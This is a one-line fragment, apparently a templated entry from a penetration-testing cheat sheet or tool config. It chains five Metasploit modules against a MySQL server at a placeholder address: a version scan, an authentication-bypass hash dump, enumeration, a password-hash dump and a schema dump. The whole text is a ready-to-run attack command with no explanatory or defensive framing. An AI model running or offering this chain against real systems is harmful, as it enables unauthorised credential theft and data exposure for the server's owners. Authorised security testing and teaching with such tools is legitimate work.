  Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'
```